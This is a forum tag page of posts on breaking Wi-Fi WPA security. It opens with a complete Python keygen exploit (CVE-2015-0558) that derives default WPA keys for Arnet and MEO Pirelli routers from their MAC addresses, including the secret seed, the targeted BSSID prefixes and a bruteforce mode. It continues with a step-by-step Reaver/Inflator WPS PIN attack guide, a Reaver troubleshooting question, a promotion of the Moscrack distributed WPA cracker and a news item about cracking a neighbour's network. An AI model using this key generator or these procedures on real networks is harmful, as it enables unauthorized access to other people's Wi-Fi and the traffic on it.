Search the Community
Showing results for tags 'wpa'.
-
#!/usr/bin/env python
# -*- coding: utf-8 -*-

'''
@license: GPLv3
@author : Eduardo Novella

@ARNetOnline via Twitter @enovella_
2014-09-15 Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

PORTUGAL
================
2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got response in matter of minutes \o/
2015-04-05 I send an email to luis-oliveira-cc@telecom.pt , stating the reference 3-78405621289 in email subject
2015-05-07 Full disclosure

-----------------
[*] Changelog :
-----------------
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working
'''

import re
import sys
import hashlib
import argparse

VERSION = 1
SUBVERSION = 4
DATEVERSION = '2015-05-06'
URL = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')

    lookup = '0123456789abcdefghijklmnopqrstuvwxyz'

    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)

    digest = bytearray(sha256.digest())

    if (stdout):
        print "[+] SHA256 : %s" % sha256.hexdigest()

    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
    print "[+] Possible vulnerable targets so far:"
    for t in targets:
        print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))
    sys.exit()

def checkTargets(bssid):
    supported = False
    for t in targets:
        if ( bssid.upper().startswith(t) ):
            supported = True
            break
    if (not supported):
        print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
    try:
        mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
    except:
        sys.exit('[!] Use real input ')
    return mac

def main():
    global targets
    version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
               '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']

    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
                                                 MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
                                                 or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable.
                                                 See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_ and email: ednolo[at]inf.upv.es. This software is used
                                                 just as proof-of-concept, commit fraud depends on you! ''',
                                     epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
                                    )

    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true')
    command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true")

    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
        try:
            checkTargets(args.bssid)
            print '[+] MAC : %s' % args.bssid

            if (args.allkeys):
                print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '%-10s' % ((genkey(mac, False)))

                print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '%-10s' % ((genkey(mac, False)[:8]))
            else:
                wpa = genkey((addIncToMac(mac_str,0)), False)
                print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
                print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" )
        except:
            sys.exit('[!] Are you trying to crash me? ')
    else:
        parser.print_help()

if __name__ == "__main__":
    main()

Source
-
The manual describes the use of Inflator from wifiway v 3.4. I won't describe what WPS is again. You don't need password dictionaries or any other tricks; it is enough for the router to have WPS enabled, and in that case the password will be found no matter how complex it is and no matter how many times the owner changes it.

Once wifiway has started, go into the menu and look for the WPA-WPS module. Start Inflator and you will see whether it recognizes your network card, wifi adapter or whatever model it is, exactly as in the image below. If your network card is recognized, click on it and below it will announce that it has been put into monitor mode, after which click next.

In the second image you will have to click the button labelled Scan for WPS enabled to scan and see whether there are routers with WPS enabled in your area. The scan time is 30 seconds, but you can change it as needed; wait for the scan to finish. After it finishes scanning, if it found routers with WPS enabled you will see them in the new window, exactly as in the image... Before clicking next, click on the network you want, and you will notice a change of color, to light blue.... that is the network you chose, and then comes next.

In the next window you are offered the option to set the desired attack type, but normally nothing is ticked; just click RUN... Once the attack has started, you will notice in that text Trying pin.... which indicates that it has begun trying the WPS PINs. Now you will have to be patient for a few hours for it to extract the password. If everything went as it should, at the end you will see something like this:

The complete manual with details, plus Reaver WPSCrackGUI 1.0.9
-
Hi everyone. I have a problem, namely with Reaver on a WPA network... it endlessly retries the same password 012345670. Oddly enough, on WPA2 it doesn't do that... what could the problem be?
-
MOSCRACK
Multifarious On-demand Systems Cracker

Moscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack's new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin.

Some of Moscrack's features:
* Basic API allows remote monitoring
* Automatic and dynamic configuration of nodes
* Live CD/USB enables boot and forget dynamic node configuration
* Can be extended by use of plugins
* Uses aircrack-ng (including 1.2 Beta) by default
* CUDA/OpenCL support via Pyrit plugin
* CUDA support via aircrack-ng-cuda (untested)
* Does not require an agent/daemon on nodes
* Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin
* Checkpoint and resume
* Easily supports a large number of nodes
* Designed to run for long periods of time
* Doesn't exit on errors/failures when possible
* Supports mixed OS/protocol configurations
* Supports SSH, RSH, Mosix for node connectivity
* Effectively handles mixed fast and slow nodes or links
* Architecture independent
* Supports Mosix clustering software
* Supports all popular operating systems as processing nodes
* Node prioritization based on speed
* Nodes can be added/removed/modified while Moscrack is running
* Failed/bad node throttling
* Hung node detection
* Reprocessing of data on error
* Automatic performance analysis and tuning
* Intercepts INT and TERM signals for clean handling
* Very verbose, doesn't hide anything, logs aggressively
* Includes a "top" like status viewer
* Includes CGI web status viewer
* Includes an optional basic X11 GUI

Compatibility

Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux.

Tested platforms for SSH based end nodes:
* Moscrack Live CD (SUSE)
* Ubuntu Linux 12.10 x86 64bit
* Ubuntu Linux 12.04.2 x86 64bit
* Ubuntu Linux 10.10 x86 64bit
* Ubuntu Linux 10.10 x86 32bit
* CentOS Linux 5.5 x86 32bit
* FreeBSD 8.1 x86 64bit
* Windows Vista Business 64bit w/Cygwin 1.7.7-1
* Windows Vista Business 64bit w/Cygwin 1.7.9
* Mac OS X 10.5.6 (iPC OSx86)
* Solaris Express 11 x64
* iPhone 3g iOS 3.2.1 (Jailbroken)
* Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot)

Tested platforms for RSH based end nodes:
* Ubuntu Linux 10.10 x86 64bit
* Windows Vista Business 64bit w/Cygwin 1.7.7-1
* Windows Vista Business 64bit w/Cygwin 1.7.9

Tested platforms for Mosix end nodes:
* Ubuntu Linux 10.10 x86 64bit
* Ubuntu Linux 10.10 x86 32bit

Tested platforms for Moscrack server:
* Ubuntu Linux 13.10 x86 64bit
* Ubuntu Linux 12.10 x86 64bit
* Ubuntu Linux 10.10 x86 64bit

Download: moscrack-2.08b.tar.gz
Sources: moscrack | Free Security & Utilities software downloads at SourceForge.net
Moscrack
-
"Roth said that he used his software and Amazon's cloud-based computers to break into a WPA-PSK protected network in his neighborhood. It took about 20 minutes of processing time. He has since updated his software to speed its performance and believes he could hack into the same network in about 6 minutes. [...] People tell me there is no possible way to break WPA, or, if it were possible, it would cost you a ton of money to do so," he said. "But it is easy to brute force them."

Source: Amazon cloud can help hack WiFi networks: expert | Reuters

The presentation will be here: Black Hat ® Technical Security Conference: DC 2011 // Briefings

Btw, if anyone knows of a live stream / download site for the Blackhat videos, feel free to share.